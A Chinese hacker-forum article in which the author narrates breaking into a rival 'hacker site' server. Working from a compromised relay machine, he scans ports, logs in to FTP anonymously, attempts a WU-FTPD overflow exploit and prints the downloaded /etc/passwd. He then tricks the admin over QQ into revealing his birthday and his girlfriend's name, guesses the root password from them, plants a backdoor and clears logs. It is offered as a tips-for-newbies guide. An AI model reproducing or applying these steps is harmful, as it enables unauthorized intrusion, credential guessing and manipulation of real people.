首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
操作系统 :: unix

黑国内一黑客站点主机的过程


http://www.gipsky.com/
  在qq上,有人以国内木xxx著名黑客站点而自居,嚣张之气,实在让人气愤,想来,俺也是做黑客站点的,



  x年前上网的时候,这个站点还在娘胎里呢。实在是。。。。今天就来个黑对黑。。。嘿嘿。。



  先对系统做个大致的了解。



  登陆我开了3389的肉鸡,一切的准备工作都在上面做的。要小心啊,要不被鹰啄了眼可就不好了。



  用那个不错的工具“清风火焰”登陆器上了肉鸡。打开cmd



  ping www.xxx.org,没有返回值,一定屏蔽了ping。看来象个管理员。



  不怕,试一下23端口



  telnet www.xxx.org 呀,是sun os 5.7 啊。这个系统好象是不太好进呢。



  开始扫描。



  其实 扫描是通过选用远程TCP/IP不同的端口的服务,并记录目标给予的回答,通过这种方法,可以搜集到



  很多关于目标主机的各种有用的信息(比如:是否能用匿名登陆!是否有可写的FTP目录,是否能用TELNET,



  HTTPD是用ROOT还是nobady在跑!)我们的扫描器应该有三项功能:发现一个主机或网络的能力;一旦发现一台主机,有发现什么服务正运行在



  这台主机上的能力;通过测试这些服务,发现漏洞的能力。



  开始吧,从肉鸡上找到我隐藏的目录,都是好东西呢。用(SuperScan)这个还有个相应的端口报告生成。



  结果:只有 21 23 80 1633 (这个端口是什么,报告没给出,管它呢)



  看来我们的目标只能放在 ftp (21)和http(80)了。



  先看有没有ftp匿名登陆,这个在国内的很多站点都存在的。



  ftp www.xxx.org



  WUFU-FTP2.4.16



  user:ftp



  passwd:xxx.21cn.com (最好是输个假的啊,呵呵)



  呵呵,这个傻帽的管理员还吹呢。,,,俺进来了。。。。看看有什么权限吗?



  ftp>ls



  user



  tmp



  welcome



  bin



  etc



  ....



  ....



  200 PORT Command successful.



  ftp>cd user (5555,没有权限的)



  ftp>cd temp



  200 PORT Command successful.



  ftp>put c:\boyhacker.txt



  200 PORT Command successful.



  哈哈!这个目录是可写的。。。管理员你要完了。。



  ftp>bye



  我记得好象谁写了篇文章就是利用WUFU-FTP2.4.16本地溢出漏洞进的吧。。来来,我们试一下。



  但是溢出代码需编译的。的找个SUN OS 的肉鸡啊。看见了吗?肉鸡的重要性了吧。



  #./wuftp www.xxx.com /tmp ftp/ftp@2.com -p 120



  connect.....



  send shell....



  wait for you shell....



  ..........



  呀呀呀呀,,,我在等关键的时刻。。。。



  哇error.,完了,不是管理员啊。是我啊,进不去了。。放弃吗?回答:no 要有点黑客精神嘛。



  再来。



  不是还有个80端口吗?来,托出宝刀流光,(发点牢骚,有的人说,用流光的人不上档次,但是真的把流光用



  的好的,有真对性的扫描未必低级)。简单的选了几项,扫。。。



  出来了,cgi漏洞只有几个:



  /class/mysql.class [漏洞描述]



  /images/ [漏洞描述]



  /manual/ [漏洞描述]



  /mysql/ [漏洞描述]



  /test/ [漏洞描述]



  gi">[漏洞描述]



  我记得好象这个/class/mysql.class 漏洞可以直接查看mysql的user password



  可是结果没有成功。(现在才知道做黑客,难啊)



  但是,不要放弃的。。不是还有个ect 目录吗》?先抓个密码再说。



  ftp > get /etc/passwd



  200 PORT Command successful.



  看看密码:



  df10% cat /etc/passwd



  root:x:0:1:Super-User:/:/bin/ksh



  daemon:x:1:1::/:



  bin:x:2:2::/usr/bin:



  sys:x:3:3::/:



  adm:x:4:4:Admin:/var/adm:



  lp:x:71:8:Line Printer Admin:/usr/spool/lp:



  smtp:x:0:0:Mail Daemon User:/:



  uucp:x:5:5:uucp Admin:/usr/lib/uucp:



  nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico



  listen:x:37:4:Network Admin:/usr/net/nls:



  nobody:x:60001:60001:Nobody:/:



  noaccess:x:60002:60002:No Access User:/:



  nobody4:x:65534:65534:SunOS 4.x Nobody:/:



  rudi:x:9001:10::/rudi:/bin/csh



  liu:x:9002:10::/liu:/bin/csh



  peng:x:9003:10::/peng:/bin/csh



  呵呵这么多用户啊。。。。



  怎么办呢?做黑客要弄脑子,要用智慧,我决定用上老米的社会工程学。



  休息。



  第2天,上qq,给那个吹的管理员聊起来了。以下是简单的记录:



  我:老大啊,你很厉害啊,做了xxx黑客站点的管理员啊。



  x:一般了,我学网络好几年了。



  我:你是几几年上的网?



  x:不是很早,99年。



  我:呵呵,那你比我早啊,我是2003年上的网,那你是我的前辈了 (骗)



  x:是的吧 (靠,不谦虚)



  我:我是82年11月21出生的,老哥是几几年啊?



  x: 我啊是80年10月26 ----------------(重点信息)



  我:最近啊,我和女朋友分手了,很怀念她。那个时候不知道珍惜,老哥一定有女朋友吧 ------(动之以情)



  x: 是的啊,我女朋友和我差不多大的,我比她大1个月零1天。----------(哇,重点信息)



  我:呵呵,你的女朋友叫什么名字啊,网名一定很好听吧?



  x: 她啊,名字是我给的(我似乎看见他甜蜜的样子)kekeren ---------(有戏)



  以下省略。。。。。]



  收集密码信息:801026 99801026 80925 80925521 kekeren80925 kekeren521---(我爱你)kekerenx



  801026kekeren ------总之尽可能的组合。



  接下来,到本文的结尾了,。。试吧。。。我是只用kekeren521就成功了。。看来他是个性情中人。。



  telnet www.xxx.org



  user:x



  passwd:kekeren521



  写到实在是不想写了。。权限是root,你想做任何你想做的事情。



  不过,我还是没更改主页,做个后门(很多方法的),拉个软件下来,清除了pp跑了。。。



  过天,在上qq上,把id给了x,可笑的是,x问我漏洞不多,是怎么拿到root的,呵呵,希望老大x见到此文不要



  吐血。。。。



  总结:其实这次黑站,其实没有什么真正的漏洞利用,但是不能不说,给菜鸟们一点思路,一点技巧。



  黑客,不是从真正意义上的去黑,而是挑战自己,挑战困难,坚毅,执著,智慧,这才是我们要学的。。。。。



  黑客总是聪明的。



  To my bestlove wayen (3015948



  
<< 入侵者跳越攻击可能进入你的内部网 利用尼姆达II病毒提升自己为系统管理员 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8